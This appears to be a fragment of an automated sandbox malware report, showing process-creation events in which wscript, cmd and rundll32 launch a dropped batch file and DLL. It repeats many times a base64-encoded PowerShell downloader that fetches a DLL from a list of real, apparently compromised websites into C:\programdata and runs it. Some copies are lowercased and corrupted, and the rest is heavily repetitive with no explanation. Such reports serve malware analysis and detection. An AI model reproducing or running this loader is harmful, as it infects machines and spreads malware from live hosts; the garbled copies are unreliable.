$IDrfghsbzkjxd;if(test-pAtH $IDrfghsbzkjxd){if((get-iTem $IDrfghsbzkjxd).Length -ge 50000){break;}}}

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc jabnagoacwblagiabgbnahuaawbpahcadqbnadmaawb3agoazaa9aciaaab0ahqacaa6ac8alwbhagmadabpahyaaqbkageazablahmalgbsageazgbvahiazqb0agwayqbuagcadqbhagcazqbzac4aywbvag0alwb3ahaalqbhagqabqbpag4alwbcagwaawbkae8aswbeafgataavacwaaab0ahqacaa6ac8alwbzagiaywbvahaaeqbsagkadgblac4aywbvag0algbiahialwbyagoadqb6ac8adwavacwaaab0ahqacabzadoalwavahqacgbhahmaaqb4ac4aywbvag0alwb3ahaalqbhagqabqbpag4alwb5aduaqqbhadeaagb0adaauwbwadiauqbrac8alaboahqadabwahmaogavac8adwb3ahcalgbwageacgbragkabgbzag8abgbzac4aywbvac4aaqbuac8ayqbiagmalwbzadyawqawagyavabiafuarqbnadyalwasaggadab0ahaacwa6ac8alwbiagkaegauag0azqbyagwaaqbuac4adqbhac8adwbwac0ayqbkag0aaqbuac8avwa2ageazwb0aeyauwbsafoarwb0admanwaxagqavgavacwaaab0ahqacaa6ac8alwbiahiadqbjagsazqb2ag4algbzagkadablac8amwb5ahoadab6ahoadgboac8abgbtafkanab3afoazgbiafkataavacwaaab0ahqacabzadoalwavahaayqbyagqaaqbzagsabwbvagqalgbjag8abqavahcacaatagmabwbuahqazqbuahqalwboafialwasaggadab0ahaacwa6ac8alwbkageadqbqagkabqbhaggayqbyageaagbtageabgbkagkacgauag8acgbnac8adwbwac0aaqbuagmabab1agqazqbzac8angazaeqazqavacwaaab0ahqacabzadoalwavagqayqb0ageacwbpahqacwauagmabwbtac8adwbwac0aaqbuagmabab1agqazqbzac8awgbragoanabrae8alwasaggadab0ahaacwa6ac8alwbhag4adqbnaguacgbhaggabqbhahmaaqbuahqazqbyag4ayqbzagkabwbuageabaauagmabwauagkazaavahcacaatageazabtagkabgavafmasgbiahgarqa1aekalwasaggadab0ahaacwa6ac8alwbhahqabqblagqaaqbjac4aywbsac8acwbpahmadablag0ayqbzac8amwbaagiacwbvaeeavqavacwaaab0ahqacabzadoalwavageabgb3ageacgbhagwaygbhahmayqb0aguazqbuac4aywbvag0alwbgag8aeaataemanaawadqalwbtaeqasabragyazwblagiatqbsahoabqbhaesaqgb5ac8aigauahmacabmagkavaaoacialaaiackaowbmae8acgblageaqwboacgajaboagsabab3afiasabkafmazqa0aggaiabpag4aiaakagcaagbzaguaygbuagcadqbragkadwb1agcamwbrahcaagbkackaewakaeoacwazaggababzagsazabjagyaawa9aciadgbiagsadwbraciaowakahmazablahcasabtahcamwbnagsaagbzagqapqbhaguadaatafiayqbuagqabwbtadsajabjaeqacgbmagcaaabzagiaegbragoaeabkad0aigbjadoaxabwahiabwbnahiayqbtagqayqb0ageaxaaiacsajabkahmamwboagwacwbragqaywbmagsakwaiac4azabsagwaiga7agkatgb2ae8aawblac0adwbfagiacgblafeadqblahmavaagac0adqbsagkaiaakaggaawbsahcaugbiaeoauwbladqaaaagac0abwb1afqazgbpaewazqagacqasqbeahiazgbnaggacwbiahoaawbqahgazaa7agkazgaoahqazqbzahqalqbwaeeadabiacaajabjaeqacgbmagcaaabzagiaegbragoaeabkackaewbpagyakaaoagcazqb0ac0aaqbuaguabqagacqasqbeahiazgbnaggacwbiahoaawbqahgazaapac4atablag4azwb0aggaiaatagcazqagaduamaawadaamaapahsaygbyaguayqbradsafqb9ah0a
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc jabnagoacwblagiabgbnahuaawbpahcadqbnadmaawb3agoazaa9aciaaab0ahqacaa6ac8alwbhagmadabpahyaaqbkageazablahmalgbsageazgbvahiazqb0agwayqbuagcadqbhagcazqbzac4aywbvag0alwb3ahaalqbhagqabqbpag4alwbcagwaawbkae8aswbeafgataavacwaaab0ahqacaa6ac8alwbzagiaywbvahaaeqbsagkadgblac4aywbvag0algbiahialwbyagoadqb6ac8adwavacwaaab0ahqacabzadoalwavahqacgbhahmaaqb4ac4aywbvag0alwb3ahaalqbhagqabqbpag4alwb5aduaqqbhadeaagb0adaauwbwadiauqbrac8alaboahqadabwahmaogavac8adwb3ahcalgbwageacgbragkabgbzag8abgbzac4aywbvac4aaqbuac8ayqbiagmalwbzadyawqawagyavabiafuarqbnadyalwasaggadab0ahaacwa6ac8alwbiagkaegauag0azqbyagwaaqbuac4adqbhac8adwbwac0ayqbkag0aaqbuac8avwa2ageazwb0aeyauwbsafoarwb0admanwaxagqavgavacwaaab0ahqacaa6ac8alwbiahiadqbjagsazqb2ag4algbzagkadablac8amwb5ahoadab6ahoadgboac8abgbtafkanab3afoazgbiafkataavacwaaab0ahqacabzadoalwavahaayqbyagqaaqbzagsabwbvagqalgbjag8abqavahcacaatagmabwbuahqazqbuahqalwboafialwasaggadab0ahaacwa6ac8alwbkageadqbqagkabqbhaggayqbyageaagbtageabgbkagkacgauag8acgbnac8adwbwac0aaqbuagmabab1agqazqbzac8angazaeqazqavacwaaab0ahqacabzadoalwavagqayqb0ageacwbpahqacwauagmabwbtac8adwbwac0aaqbuagmabab1agqazqbzac8awgbragoanabrae8alwasaggadab0ahaacwa6ac8alwbhag4adqbnaguacgbhaggabqbhahmaaqbuahqazqbyag4ayqbzagkabwbuageabaauagmabwauagkazaavahcacaatageazabtagkabgavafmasgbiahgarqa1aekalwasaggadab0ahaacwa6ac8alwbhahqabqblagqaaqbjac4aywbsac8acwbpahmadablag0ayqbzac8amwbaagiacwbvaeeavqavacwaaab0ahqacabzadoalwavageabgb3ageacgbhagwaygbhahmayqb0aguazqbuac4aywbvag0alwbgag8aeaataemanaawadqalwbtaeqasabragyazwblagiatqbsahoabqbhaesaqgb5ac8aigauahmacabmagkavaaoacialaaiackaowbmae8acgblageaqwboacgajaboagsabab3afiasabkafmazqa0aggaiabpag4aiaakagcaagbzaguaygbuagcadqbragkadwb1agcamwbrahcaagbkackaewakaeoacwazaggababzagsazabjagyaawa9aciadgbiagsadwbraciaowakahmazablahcasabtahcamwbnagsaagbzagqapqbhaguadaatafiayqbuagqabwbtadsajabjaeqacgbmagcaaabzagiaegbragoaeabkad0aigbjadoaxabwahiabwbnahiayqbtagqayqb0ageaxaaiacsajabkahmamwboagwacwbragqaywbmagsakwaiac4azabsagwaiga7agkatgb2ae8aawblac0adwbfagiacgblafeadqblahmavaagac0adqbsagkaiaakaggaawbsahcaugbiaeoauwbladqaaaagac0abwb1afqazgbpaewazqagacqasqbeahiazgbnaggacwbiahoaawbqahgazaa7agkazgaoahqazqbzahqalqbwaeeadabiacaajabjaeqacgbmagcaaabzagiaegbragoaeabkackaewbpagyakaaoagcazqb0ac0aaqbuaguabqagacqasqbeahiazgbnaggacwbiahoaawbqahgazaapac4atablag4azwb0aggaiaatagcazqagaduamaawadaamaapahsaygbyaguayqbradsafqb9ah0a
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc jabnagoacwblagiabgbnahuaawbpahcadqbnadmaawb3agoazaa9aciaaab0ahqacaa6ac8alwbhagmadabpahyaaqbkageazablahmalgbsageazgbvahiazqb0agwayqbuagcadqbhagcazqbzac4aywbvag0alwb3ahaalqbhagqabqbpag4alwbcagwaawbkae8aswbeafgataavacwaaab0ahqacaa6ac8alwbzagiaywbvahaaeqbsagkadgblac4aywbvag0algbiahialwbyagoadqb6ac8adwavacwaaab0ahqacabzadoalwavahqacgbhahmaaqb4ac4aywbvag0alwb3ahaalqbhagqabqbpag4alwb5aduaqqbhadeaagb0adaauwbwadiauqbrac8alaboahqadabwahmaogavac8adwb3ahcalgbwageacgbragkabgbzag8abgbzac4aywbvac4aaqbuac8ayqbiagmalwbzadyawqawagyavabiafuarqbnadyalwasaggadab0ahaacwa6ac8alwbiagkaegauag0azqbyagwaaqbuac4adqbhac8adwbwac0ayqbkag0aaqbuac8avwa2ageazwb0aeyauwbsafoarwb0admanwaxagqavgavacwaaab0ahqacaa6ac8alwbiahiadqbjagsazqb2ag4algbzagkadablac8amwb5ahoadab6ahoadgboac8abgbtafkanab3afoazgbiafkataavacwaaab0ahqacabzadoalwavahaayqbyagqaaqbzagsabwbvagqalgbjag8abqavahcacaatagmabwbuahqazqbuahqalwboafialwasaggadab0ahaacwa6ac8alwbkageadqbqagkabqbhaggayqbyageaagbtageabgbkagkacgauag8acgbnac8adwbwac0aaqbuagmabab1agqazqbzac8angazaeqazqavacwaaab0ahqacabzadoalwavagqayqb0ageacwbpahqacwauagmabwbtac8adwbwac0aaqbuagmabab1agqazqbzac8awgbragoanabrae8alwasaggadab0ahaacwa6ac8alwbhag4adqbnaguacgbhaggabqbhahmaaqbuahqazqbyag4ayqbzagkabwbuageabaauagmabwauagkazaavahcacaatageazabtagkabgavafmasgbiahgarqa1aekalwasaggadab0ahaacwa6ac8alwbhahqabqblagqaaqbjac4aywbsac8acwbpahmadablag0ayqbzac8amwbaagiacwbvaeeavqavacwaaab0ahqacabzadoalwavageabgb3ageacgbhagwaygbhahmayqb0aguazqbuac4aywbvag0alwbgag8aeaataemanaawadqalwbtaeqasabragyazwblagiatqbsahoabqbhaesaqgb5ac8aigauahmacabmagkavaaoacialaaiackaowbmae8acgblageaqwboacgajaboagsabab3afiasabkafmazqa0aggaiabpag4aiaakagcaagbzaguaygbuagcadqbragkadwb1agcamwbrahcaagbkackaewakaeoacwazaggababzagsazabjagyaawa9aciadgbiagsadwbraciaowakahmazablahcasabtahcamwbnagsaagbzagqapqbhaguadaatafiayqbuagqabwbtadsajabjaeqacgbmagcaaabzagiaegbragoaeabkad0aigbjadoaxabwahiabwbnahiayqbtagqayqb0ageaxaaiacsajabkahmamwboagwacwbragqaywbmagsakwaiac4azabsagwaiga7agkatgb2ae8aawblac0adwbfagiacgblafeadqblahmavaagac0adqbsagkaiaakaggaawbsahcaugbiaeoauwbladqaaaagac0abwb1afqazgbpaewazqagacqasqbeahiazgbnaggacwbiahoaawbqahgazaa7agkazgaoahqazqbzahqalqbwaeeadabiacaajabjaeqacgbmagcaaabzagiaegbragoaeabkackaewbpagyakaaoagcazqb0ac0aaqbuaguabqagacqasqbeahiazgbnaggacwbiahoaawbqahgazaapac4atablag4azwb0aggaiaatagcazqagaduamaawadaamaapahsaygbyaguayqbradsafqb9ah0a
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc jabnagoacwblagiabgbnahuaawbpahcadqbnadmaawb3agoazaa9aciaaab0ahqacaa6ac8alwbhagmadabpahyaaqbkageazablahmalgbsageazgbvahiazqb0agwayqbuagcadqbhagcazqbzac4aywbvag0alwb3ahaalqbhagqabqbpag4alwbcagwaawbkae8aswbeafgataavacwaaab0ahqacaa6ac8alwbzagiaywbvahaaeqbsagkadgblac4aywbvag0algbiahialwbyagoadqb6ac8adwavacwaaab0ahqacabzadoalwavahqacgbhahmaaqb4ac4aywbvag0alwb3ahaalqbhagqabqbpag4alwb5aduaqqbhadeaagb0adaauwbwadiauqbrac8alaboahqadabwahmaogavac8adwb3ahcalgbwageacgbragkabgbzag8abgbzac4aywbvac4aaqbuac8ayqbiagmalwbzadyawqawagyavabiafuarqbnadyalwasaggadab0ahaacwa6ac8alwbiagkaegauag0azqbyagwaaqbuac4adqbhac8adwbwac0ayqbkag0aaqbuac8avwa2ageazwb0aeyauwbsafoarwb0admanwaxagqavgavacwaaab0ahqacaa6ac8alwbiahiadqbjagsazqb2ag4algbzagkadablac8amwb5ahoadab6ahoadgboac8abgbtafkanab3afoazgbiafkataavacwaaab0ahqacabzadoalwavahaayqbyagqaaqbzagsabwbvagqalgbjag8abqavahcacaatagmabwbuahqazqbuahqalwboafialwasaggadab0ahaacwa6ac8alwbkageadqbqagkabqbhaggayqbyageaagbtageabgbkagkacgauag8acgbnac8adwbwac0aaqbuagmabab1agqazqbzac8angazaeqazqavacwaaab0ahqacabzadoalwavagqayqb0ageacwbpahqacwauagmabwbtac8adwbwac0aaqbuagmabab1agqazqbzac8awgbragoanabrae8alwasaggadab0ahaacwa6ac8alwbhag4adqbnaguacgbhaggabqbhahmaaqbuahqazqbyag4ayqbzagkabwbuageabaauagmabwauagkazaavahcacaatageazabtagkabgavafmasgbiahgarqa1aekalwasaggadab0ahaacwa6ac8alwbhahqabqblagqaaqbjac4aywbsac8acwbpahmadablag0ayqbzac8amwbaagiacwbvaeeavqavacwaaab0ahqacabzadoalwavageabgb3ageacgbhagwaygbhahmayqb0aguazqbuac4aywbvag0alwbgag8aeaataemanaawadqalwbtaeqasabragyazwblagiatqbsahoabqbhaesaqgb5ac8aigauahmacabmagkavaaoacialaaiackaowbmae8acgblageaqwboacgajaboagsabab3afiasabkafmazqa0aggaiabpag4aiaakagcaagbzaguaygbuagcadqbragkadwb1agcamwbrahcaagbkackaewakaeoacwazaggababzagsazabjagyaawa9aciadgbiagsadwbraciaowakahmazablahcasabtahcamwbnagsaagbzagqapqbhaguadaatafiayqbuagqabwbtadsajabjaeqacgbmagcaaabzagiaegbragoaeabkad0aigbjadoaxabwahiabwbnahiayqbtagqayqb0ageaxaaiacsajabkahmamwboagwacwbragqaywbmagsakwaiac4azabsagwaiga7agkatgb2ae8aawblac0adwbfagiacgblafeadqblahmavaagac0adqbsagkaiaakaggaawbsahcaugbiaeoauwbladqaaaagac0abwb1afqazgbpaewazqagacqasqbeahiazgbnaggacwbiahoaawbqahgazaa7agkazgaoahqazqbzahqalqbwaeeadabiacaajabjaeqacgbmagcaaabzagiaegbragoaeabkackaewbpagyakaaoagcazqb0ac0aaqbuaguabqagacqasqbeahiazgbnaggacwbiahoaawbqahgazaapac4atablag4azwb0aggaiaatagcazqagaduamaawadaamaapahsaygbyaguayqbradsafqb9ah0a	Jump to behavior
